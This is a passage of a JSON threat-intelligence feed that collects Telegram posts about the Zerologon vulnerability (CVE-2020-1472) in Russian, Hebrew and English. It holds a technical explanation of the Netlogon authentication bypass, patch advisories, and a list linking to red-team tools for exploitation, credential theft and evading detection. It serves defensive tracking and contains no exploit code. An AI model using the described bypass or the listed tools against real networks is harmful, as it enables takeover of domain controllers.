\u0441\u043e\u0431\u044b\u0442\u0438\u044f\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 \u0430\u0443\u0434\u0438\u0442\u0430 Windows;\n\u25aa\ufe0f\u043f\u043e \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u0442\u0440\u0430\u0444\u0438\u043a\u0443;\n\u25aa\ufe0f\u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438\u00a0YARA-\u043f\u0440\u0430\u0432\u0438\u043b.\n\n\u0414\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u043f\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u0442\u0430\u043a \u0438 \u0432\u043c\u0435\u0441\u0442\u0435, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0444\u0430\u043a\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0438 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u043a\u0430\u0436\u0434\u043e\u043c \u0438\u0437 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0447\u0438\u0442\u0430\u0439\u0442\u0435 \u0432 \u043d\u0430\u0448\u0435\u043c \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0435.", "creation_timestamp": "2020-11-03T14:00:37.000000Z"}, {"uuid": "8962a31b-fc25-42f0-9aa3-f83887c6b75a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2079", "content": "CVE-2020-1472: Zerologon\nhttps://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472", "creation_timestamp": "2020-09-14T17:07:13.000000Z"}, {"uuid": "0fcfba71-bd53-48d0-9f19-53f3dc67409c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/tech_b0lt_Genona/2078", "content": "\u0411\u043e\u043b\u044c\u0448\u043e\u0439 \u0448\u0443\u043c \u043f\u043e\u0434\u043d\u044f\u043b\u0441\u044f \u0432 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u0441\u043b\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0433\u043e\u043b\u043b\u0430\u043d\u0434\u0441\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Secure BV \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0439 Microsoft \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u043e\u0432\u0441\u043a\u043e\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0439 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Zerologon.  \n\n\u0425\u043e\u0442\u044f \u0440\u0430\u043d\u0435\u0435 \u0438 \u0431\u044b\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 10 \u0438\u0437 10  \u043f\u043e \u0448\u043a\u0430\u043b\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u0438 \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Netlogon, \u0441\u043b\u0443\u0436\u0431\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 Windows Server, \u043f\u043e\u043b\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043d\u0435 \u0431\u044b\u043b\u043e. \u041e\u043d\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0432\u0441\u0435\u0445 \u043d\u0430 \u0443\u0448\u0438.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0435 \u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 Netlogon Remote Protocol. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u044f \u0437\u0430 \u043b\u044e\u0431\u043e\u0439 \u0445\u043e\u0441\u0442 \u0432 \u0441\u0435\u0442\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0441\u0430\u043c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Netlogon \u0438 \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0432 Active Directory. \n\n\u0412 \u0447\u0435\u043c \u0436\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0430\u0441\u044c \u043e\u0448\u0438\u0431\u043a\u0430? \u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f AES-CFB8 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 ComputeNetlogonCredential, \u0433\u0434\u0435 \u0432\u0435\u043a\u0442\u043e\u0440 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 (IV) \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0438 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 16 \u043d\u0443\u043b\u0435\u0432\u044b\u0445 \u0431\u0430\u0439\u0442\u043e\u0432, \u0445\u043e\u0442\u044f \u043f\u043e \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u043d \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u043c. \u0412 \u0438\u0442\u043e\u0433\u0435 \u0434\u043b\u044f 1 \u0438\u0437 256 \u043a\u043b\u044e\u0447\u0435\u0439 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u0432\u0432\u043e\u0434\u0443, \u0441\u043e\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0438\u0437 \u0432\u0441\u0435\u0445 \u043d\u0443\u043b\u0435\u0439, \u0434\u0430\u0441\u0442 \u0442\u0430\u043a\u043e\u0439 \u0436\u0435 \u043d\u0443\u043b\u0435\u0432\u043e\u0439 \u0432\u044b\u0432\u043e\u0434.\n\n\u0427\u0435\u043c \u0436\u0435 \u044d\u0442\u043e \u043f\u043b\u043e\u0445\u043e? \u0410 \u0442\u0435\u043c, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440, \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u043f\u043e\u0434\u0440\u044f\u0434 (\u0441\u0440\u0435\u0434\u043d\u0435\u0435 \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0440\u0430\u0432\u043d\u044f\u0435\u0442\u0441\u044f 256), \u043c\u043e\u0436\u0435\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0434\u0438\u043d \u0438\u0437 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0445 \u0435\u0433\u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432, ClientCredential, \u0432\u044b\u0447\u0438\u0441\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0440\u0430\u0437 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ComputeNetlogonCredential. \u0422\u043e \u0435\u0441\u0442\u044c \u0432 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u0432 1 \u0438\u0437 256 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u0440\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0438\u0437 8 \u043d\u0443\u043b\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u043e\u0436\u0438\u0434\u0430\u0442\u044c ClientCredential \u0442\u0430\u043a\u0436\u0435 \u0438\u0437 8 \u043d\u0443\u043b\u0435\u0439.\n\n\u0410 \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043d\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0432\u0435\u0440\u043d\u043e\u0433\u043e \u043e\u0442\u0432\u0435\u0442\u0430, \u0442\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043d\u0430\u043f\u0438\u0445\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0443 8 \u043d\u0443\u043b\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0439\u043c\u0435\u0442 \u043e\u043a\u043e\u043b\u043e 3 \u0441\u0435\u043a\u0443\u043d\u0434, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u0440\u043e\u0439\u0434\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \n\n\u0412 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0445\u0430\u043a\u0435\u0440 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043c\u0435\u0442 \u0435\u0449\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0440\u044e\u043a\u043e\u0432, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e ComputeNetlogonCredential, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e \u0432\u0437\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u043f\u043e\u0434 \u0441\u0432\u043e\u044e \u0432\u043b\u0430\u0441\u0442\u044c.\n\n\u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 - \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u0435\u0435 \u0438\u0437\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0432 \u043e\u0434\u043d\u0443 \u0438\u0437 \u043c\u0430\u0448\u0438\u043d. \u041d\u043e \u044d\u0442\u043e \u0437\u0430\u0434\u0430\u0447\u0430 \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0440\u0435\u0448\u0430\u0435\u043c\u0430\u044f.\n\n\u0412\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 Microsoft \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 \u043f\u0430\u0442\u0447 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon, \u0434\u0435\u043b\u0430\u044f \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 NRPC \u0442\u0440\u0430\u043d\u0441\u043f\u043e\u0440\u0442\u043d\u043e\u0433\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0433 \u043e\u0431\u043e\u0439\u0442\u0438, \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0432 \u0435\u0433\u043e \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u043a\u043b\u0438\u0435\u043d\u0442\u0430 (\u0442\u0430\u043a\u043e\u0435 \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u043b\u043e\u0441\u044c). \n\n\u0418\u043d\u0444\u043e\u0441\u0435\u043a \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u0438\u0437\u043d\u0430\u044e\u0442 Zerologon \u0432\u0435\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0438 \u043e\u0447\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e - \"This is really scary\". \u0427\u0442\u043e\u0431\u044b \u043d\u0435 \u0431\u044b\u043b\u043e \"scary\" \u043d\u0430\u0434\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0430\u043f\u0434\u0435\u0439\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u0438 Windows Server.", "creation_timestamp": "2020-09-14T17:05:34.000000Z"}, {"uuid": "2007ba37-76d5-47de-9cba-96fd6b2d4311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/2085", "content": "> \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430 Samba \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0447\u0442\u043e \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 Windows \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c ZeroLogin (CVE-2020-1472) \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438 \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u043d\u0430 \u0431\u0430\u0437\u0435 Samba. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043d\u0435\u0434\u043e\u0440\u0430\u0431\u043e\u0442\u043a\u0430\u043c\u0438 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 MS-NRPC \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0435 AES-CFB8, \u0438 \u043f\u0440\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0435 \u0434\u043e\u043c\u0435\u043d\u0430.\n\nhttps://www.opennet.ru/opennews/art.shtml?num=53728", "creation_timestamp": "2020-09-17T09:16:10.000000Z"}, {"uuid": "1ff9cd0e-5bcf-448b-aad8-94a6a02a9c7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/CyberGovIL/822", "content": "\u05e2\u05d3\u05db\u05d5\u05df \u05d4\u05d0\u05d1\u05d8\u05d7\u05d4 \u05d4\u05d7\u05d5\u05d3\u05e9\u05d9 \u05e9\u05dc \u05de\u05d9\u05e7\u05e8\u05d5\u05e1\u05d5\u05e4\u05d8 - \u05d0\u05d5\u05d2\u05d5\u05e1\u05d8 2020 | LEA102064\n\n\u05d1-11 \u05dc\u05d7\u05d5\u05d3\u05e9 \u05e4\u05e8\u05e1\u05de\u05d4 \u05de\u05d9\u05e7\u05e8\u05d5\u05e1\u05d5\u05e4\u05d8 \u05db-120 \u05e2\u05d3\u05db\u05d5\u05e0\u05d9 \u05d0\u05d1\u05d8\u05d7\u05d4 \u05dc\u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05d1\u05ea\u05d5\u05db\u05e0\u05d5\u05ea \u05e0\u05ea\u05de\u05db\u05d5\u05ea. 17 \u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05de\u05e1\u05d5\u05d5\u05d2\u05d5\u05ea \u05db\u05e7\u05e8\u05d9\u05d8\u05d9\u05d5\u05ea.\n\n\u05d4\u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05d4\u05d7\u05de\u05d5\u05e8\u05d5\u05ea \u05d1\u05d9\u05d5\u05ea\u05e8 \u05e2\u05dc\u05d5\u05dc\u05d5\u05ea \u05dc\u05d0\u05e4\u05e9\u05e8 \u05dc\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05d4\u05e4\u05e2\u05dc\u05ea \u05e7\u05d5\u05d3 \u05de\u05e8\u05d7\u05d5\u05e7 (RCE).\n\n2 \u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05de\u05e0\u05d5\u05e6\u05dc\u05d5\u05ea \u05d1\u05e4\u05d5\u05e2\u05dc \u05d1\u05ea\u05e7\u05d9\u05e4\u05d5\u05ea \u05d1\u05e2\u05d5\u05dc\u05dd (Zero day).\n\n\u05ea\u05e9\u05d5\u05de\u05ea \u05dc\u05d9\u05d1\u05db\u05dd \u05dc\u05e4\u05d2\u05d9\u05e2\u05d5\u05ea \u05d1\u05e9\u05d9\u05e8\u05d5\u05ea NetLogon (CVE-2020-1472) \u05d5\u05dc\u05d8\u05d9\u05e4\u05d5\u05dc \u05d1\u05d4, \u05d4\u05de\u05d5\u05e8\u05db\u05d1 \u05de\u05de\u05e1\u05e4\u05e8 \u05e9\u05dc\u05d1\u05d9\u05dd.\n\n\u05de\u05d5\u05de\u05dc\u05e5 \u05de\u05d0\u05d3 \u05dc\u05d1\u05d7\u05d5\u05df \u05d4\u05e2\u05d3\u05db\u05d5\u05e0\u05d9\u05dd \u05d1\u05e1\u05d1\u05d9\u05d1\u05ea \u05e0\u05d9\u05e1\u05d5\u05d9, \u05d5\u05dc\u05d4\u05ea\u05e7\u05d9\u05e0\u05dd \u05d1\u05d4\u05e7\u05d3\u05dd \u05d4\u05d0\u05e4\u05e9\u05e8\u05d9.", "creation_timestamp": "2020-08-12T13:06:42.000000Z"}, {"uuid": "7e3bc70a-c31c-44b4-81af-5d0738454d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/2089", "content": "address of these users so that you can target their box.  Link: https://github.com/HunnicCyber/SharpSniper      SharpSphere:    Description: SharpSphere gives red teamers the ability to easily interact with the guest operating systems of virtual machines managed by vCenter  Link: https://github.com/JamesCooteUK/SharpSphere      SharpSpray:    Description: SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.  Link: https://github.com/jnqpblc/SharpSpray      SharpSQLPwn:    Description: C# tool to identify and exploit weaknesses with MSSQL instances in Active Directory environments  Link: https://github.com/lefayjey/SharpSQLPwn      SharpStay:    Description: .NET Persistence  Link: https://github.com/0xthirteen/SharpStay      SharpSvc:    Description: SharpSvc is a simple code set to interact with the SC Manager API using the same DCERPC process as sc.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP   port  Link: https://github.com/jnqpblc/SharpSvc      SharpTask:    Description: SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCERPC process as schtasks.exe, which open with TCP port 135 and is followed by the use of   an ephemeral TCP port.  Link: https://github.com/jnqpblc/SharpTask      SharpUp:    Description: SharpUp is a C# port of various PowerUp functionality  Link: https://github.com/GhostPack/SharpUp      SharpView:    Description: .NET port of PowerView  Link: https://github.com/tevora-threat/SharpView      SharpWebServer:    Description: Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes  Link: https://github.com/mgeeky/SharpWebServer      SharpWifiGrabber:    Description: Retrieves in clear-text the Wi-Fi Passwords from all WLAN Profiles saved on a workstation  Link: https://github.com/r3nhat/SharpWifiGrabber      SharpWMI:    Description: SharpWMI is a C# implementation of various WMI functionality.  Link: https://github.com/GhostPack/SharpWMI      SharpZeroLogon:    Description: An exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass.  Link: https://github.com/nccgroup/nccfsas      Shhmon:    Description: While Sysmon's driver can be renamed at installation, it is always loaded at altitude 385201. The objective of this tool is to challenge the assumption that our defensive tools are   always collecting events.  Link: https://github.com/matterpreter/Shhmon      Snaffler:    Description: Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD   environment).  Link: https://github.com/SnaffCon/Snaffler      SqlClient:    Description: C# .NET mssql client for accessing database data through beacon.  Link: https://github.com/FortyNorthSecurity/SqlClient      StandIn:    Description: StandIn is a small AD post-compromise toolkit  Link: https://github.com/FuzzySecurity/StandIn      SweetPotato:    Description: A collection of various native Windows privilege escalation techniques from service accounts to SYSTEM  Link: https://github.com/CCob/SweetPotato      ThreatCheck:    Description: Modified version of Matterpreter's DefenderCheck  Link: https://github.com/rasta-mouse/ThreatCheck      TokenStomp:    Description: C# POC for the token privilege removal flaw reported  Link: https://github.com/MartinIngesen/TokenStomp      TruffleSnout:    Description: Iterative AD discovery toolkit for offensive operators  Link: https://github.com/dsnezhkov/TruffleSnout      Watson:    Description: Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.  Link: https://github.com/rasta-mouse/Watson      Whisker:    Description: Whisker is a C#", "creation_timestamp": "2023-02-17T13:46:41.000000Z"}, {"uuid": "d5e7032c-99de-42bc-b3fa-0f3ade920814", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/BleepingComputer/8221", "content": "Microsoft clarifies patch confusion for Windows Zerologon flaw\n\nMicrosoft clarified the steps customers should take to make sure that their devices are protected against ongoing attacks using Windows Server Zerologon\u00a0(CVE-2020-1472) exploits. [...]\n\nhttps://www.bleepingcomputer.com/news/security/microsoft-clarifies-patch-confusion-for-windows-zerologon-flaw/", "creation_timestamp": "2020-09-29T15:09:03.000000Z"}, {"uuid": "c4fee9f7-fd8a-4c39-b501-270f1ede16a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": 